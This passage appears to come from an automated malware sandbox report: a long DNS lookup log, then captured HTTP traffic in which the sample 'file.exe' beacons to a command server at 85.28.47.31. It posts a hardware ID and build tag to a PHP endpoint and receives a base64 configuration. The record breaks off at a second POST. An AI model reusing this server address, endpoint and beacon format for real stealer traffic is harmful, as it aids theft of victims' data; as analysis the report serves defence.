                                                                                        Jul 24, 2024 07:15:01.898766041 CEST1.1.1.1192.168.2.60xb0a2No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.079056025 CEST1.1.1.1192.168.2.60xb07fNo error (0)firefox.settings.services.mozilla.comprod.remote-settings.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.079056025 CEST1.1.1.1192.168.2.60xb07fNo error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.079065084 CEST1.1.1.1192.168.2.60x7e02No error (0)services.addons.mozilla.org18.66.102.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.079065084 CEST1.1.1.1192.168.2.60x7e02No error (0)services.addons.mozilla.org18.66.102.124A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.079065084 CEST1.1.1.1192.168.2.60x7e02No error (0)services.addons.mozilla.org18.66.102.29A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.079065084 CEST1.1.1.1192.168.2.60x7e02No error (0)services.addons.mozilla.org18.66.102.71A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.079996109 CEST1.1.1.1192.168.2.60x60c3No error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.079996109 CEST1.1.1.1192.168.2.60x60c3No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.102818966 CEST1.1.1.1192.168.2.60xf02dNo error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.110838890 CEST1.1.1.1192.168.2.60x35dcNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.110838890 CEST1.1.1.1192.168.2.60x35dcNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.112129927 CEST1.1.1.1192.168.2.60x609aNo error (0)services.addons.mozilla.org18.66.102.124A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.112129927 CEST1.1.1.1192.168.2.60x609aNo error (0)services.addons.mozilla.org18.66.102.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.112129927 CEST1.1.1.1192.168.2.60x609aNo error (0)services.addons.mozilla.org18.66.102.71A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.112129927 CEST1.1.1.1192.168.2.60x609aNo error (0)services.addons.mozilla.org18.66.102.29A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.118392944 CEST1.1.1.1192.168.2.60x9a2cNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.598896027 CEST1.1.1.1192.168.2.60xeb6eNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.598896027 CEST1.1.1.1192.168.2.60xeb6eNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:10.303092957 CEST1.1.1.1192.168.2.60x1ebdNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:10.303092957 CEST1.1.1.1192.168.2.60x1ebdNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:10.775100946 CEST1.1.1.1192.168.2.60x9e7fNo error (0)a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.coma17.rackcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:10.775100946 CEST1.1.1.1192.168.2.60x9e7fNo error (0)a17.rackcdn.coma17.rackcdn.com.mdc.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:36.066937923 CEST1.1.1.1192.168.2.60xea79No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:36.077641964 CEST1.1.1.1192.168.2.60x9f2cNo error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:36.604274988 CEST1.1.1.1192.168.2.60x7310No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:36.783232927 CEST1.1.1.1192.168.2.60x940eNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:36.783232927 CEST1.1.1.1192.168.2.60x940eNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:42.314878941 CEST1.1.1.1192.168.2.60xbf58No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:42.314878941 CEST1.1.1.1192.168.2.60xbf58No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:43.321084976 CEST1.1.1.1192.168.2.60xbf58No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:43.321084976 CEST1.1.1.1192.168.2.60xbf58No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:44.315766096 CEST1.1.1.1192.168.2.60xbf58No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:44.315766096 CEST1.1.1.1192.168.2.60xbf58No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:46.321396112 CEST1.1.1.1192.168.2.60xbf58No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:46.321396112 CEST1.1.1.1192.168.2.60xbf58No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:50.334304094 CEST1.1.1.1192.168.2.60xbf58No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:50.334304094 CEST1.1.1.1192.168.2.60xbf58No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:17:22.927659035 CEST1.1.1.1192.168.2.60x25a1No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:17:22.927669048 CEST1.1.1.1192.168.2.60xe560No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:17:22.927669048 CEST1.1.1.1192.168.2.60xe560No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:17:41.135144949 CEST1.1.1.1192.168.2.60x7c16No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:17:41.662852049 CEST1.1.1.1192.168.2.60xa584No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:17:41.662852049 CEST1.1.1.1192.168.2.60xa584No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:18:15.640681982 CEST1.1.1.1192.168.2.60xccaaNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:18:15.640681982 CEST1.1.1.1192.168.2.60xccaaNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:18:43.445940971 CEST1.1.1.1192.168.2.60x3bb3No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:18:43.445940971 CEST1.1.1.1192.168.2.60x3bb3No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:18:43.446208000 CEST1.1.1.1192.168.2.60x8f57No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:37.442490101 CEST1.1.1.1192.168.2.60xdc53No error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:37.442490101 CEST1.1.1.1192.168.2.60xdc53No error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:37.442490101 CEST1.1.1.1192.168.2.60xdc53No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:37.453937054 CEST1.1.1.1192.168.2.60x7eb3No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:37.462101936 CEST1.1.1.1192.168.2.60x9f68No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:38.460230112 CEST1.1.1.1192.168.2.60xceb5No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:38.460230112 CEST1.1.1.1192.168.2.60xceb5No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:20:29.991337061 CEST1.1.1.1192.168.2.60x2104No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:20:29.991337061 CEST1.1.1.1192.168.2.60x2104No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:21:42.366985083 CEST1.1.1.1192.168.2.60x6c97No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:21:42.863106012 CEST1.1.1.1192.168.2.60x1No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:21:43.362155914 CEST1.1.1.1192.168.2.60x24No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:21:43.362155914 CEST1.1.1.1192.168.2.60x24No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com172.217.16.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.859431982 CEST1.1.1.1192.168.2.60x4c80No error (0)youtube-ui.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com172.217.16.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.74.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.868793011 CEST1.1.1.1192.168.2.60x5fa9No error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.877089977 CEST1.1.1.1192.168.2.60x380eNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.877089977 CEST1.1.1.1192.168.2.60x380eNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.877089977 CEST1.1.1.1192.168.2.60x380eNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.877089977 CEST1.1.1.1192.168.2.60x380eNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.927017927 CEST1.1.1.1192.168.2.60x3786No error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.927017927 CEST1.1.1.1192.168.2.60x3786No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.938951969 CEST1.1.1.1192.168.2.60x5703No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.004468918 CEST1.1.1.1192.168.2.60x7b6eNo error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.017756939 CEST1.1.1.1192.168.2.60x56d3No error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.064816952 CEST1.1.1.1192.168.2.60x8c5fNo error (0)spocs.getpocket.comprod.ads.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.064816952 CEST1.1.1.1192.168.2.60x8c5fNo error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.312448025 CEST1.1.1.1192.168.2.60xf983No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.312477112 CEST1.1.1.1192.168.2.60xf983No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.312593937 CEST1.1.1.1192.168.2.60x895bNo error (0)push.services.mozilla.comautopush.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.312624931 CEST1.1.1.1192.168.2.60x895bNo error (0)push.services.mozilla.comautopush.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.313246012 CEST1.1.1.1192.168.2.60xa00bNo error (0)shavar.services.mozilla.comshavar.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.408323050 CEST1.1.1.1192.168.2.60xc1b7No error (0)firefox.settings.services.mozilla.comprod.remote-settings.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.408323050 CEST1.1.1.1192.168.2.60xc1b7No error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.441694021 CEST1.1.1.1192.168.2.60xe610No error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.449727058 CEST1.1.1.1192.168.2.60x129dNo error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.794485092 CEST1.1.1.1192.168.2.60x1No error (0)shavar.services.mozilla.comshavar.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:17.020853996 CEST1.1.1.1192.168.2.60xedd6No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:32.920504093 CEST1.1.1.1192.168.2.60xb647No error (0)push.services.mozilla.comautopush.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:34.791907072 CEST1.1.1.1192.168.2.60x5e36No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:34.791907072 CEST1.1.1.1192.168.2.60x5e36No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:34.824043989 CEST1.1.1.1192.168.2.60x5e36No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:34.824043989 CEST1.1.1.1192.168.2.60x5e36No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:35.830101967 CEST1.1.1.1192.168.2.60x5e36No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:35.830101967 CEST1.1.1.1192.168.2.60x5e36No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:37.831300020 CEST1.1.1.1192.168.2.60x5e36No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:37.831300020 CEST1.1.1.1192.168.2.60x5e36No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:41.834973097 CEST1.1.1.1192.168.2.60x5e36No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:41.834973097 CEST1.1.1.1192.168.2.60x5e36No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:45.967165947 CEST1.1.1.1192.168.2.60xe0c3No error (0)push.services.mozilla.comautopush.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:45.967236996 CEST1.1.1.1192.168.2.60xe0c3No error (0)push.services.mozilla.comautopush.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:54.677736998 CEST1.1.1.1192.168.2.60x7494No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:54.677736998 CEST1.1.1.1192.168.2.60x7494No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:23:04.854228973 CEST1.1.1.1192.168.2.60x7063No error (0)support.mozilla.orgprod.sumo.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:23:04.854228973 CEST1.1.1.1192.168.2.60x7063No error (0)prod.sumo.prod.webservices.mozgcp.netus-west1.prod.sumo.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:23:04.854228973 CEST1.1.1.1192.168.2.60x7063No error (0)us-west1.prod.sumo.prod.webservices.mozgcp.net34.149.128.2A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:23:04.863663912 CEST1.1.1.1192.168.2.60xbbe6No error (0)us-west1.prod.sumo.prod.webservices.mozgcp.net34.149.128.2A (IP address)IN (0x0001)false

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.64971185.28.47.31801588C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:14:08.986838102 CEST86OUTGET / HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:09.650543928 CEST203INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:09 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:14:09.654838085 CEST409OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----HCBGDGCAAKJEBFIDBAAA
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 211
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 34 32 41 32 42 37 30 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 2d 2d 0d 0a
                                                                                        Data Ascii: ------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="hwid"8A42A2B70D8C1730677652------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="build"sila------HCBGDGCAAKJEBFIDBAAA--
                                                                                        Jul 24, 2024 07:14:10.315244913 CEST407INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:09 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 180
                                                                                        Keep-Alive: timeout=5, max=99
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 5a 44 55 77 4e 44 6c 68 59 57 4a 6a 5a 44 64 68 4f 44 42 6a 4f 54 59 31 59 6d 45 34 4f 44 51 34 59 6a 51 79 59 7a 4d 30 4e 6a 49 35 5a 47 51 7a 5a 6d 49 77 59 32 56 68 5a 44 52 69 4e 6a 59 77 4e 47 51 35 4d 6d 45 77 4d 6a 52 68 4e 6a 42 68 4e 44 4d 77 4e 6d 55 34 4f 44 4d 7a 5a 6d 46 69 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                        Data Ascii: ZDUwNDlhYWJjZDdhODBjOTY1YmE4ODQ4YjQyYzM0NjI5ZGQzZmIwY2VhZDRiNjYwNGQ5MmEwMjRhNjBhNDMwNmU4ODMzZmFifHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
                                                                                        Jul 24, 2024 07:14:10.353066921 CEST466OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIII
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 268
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
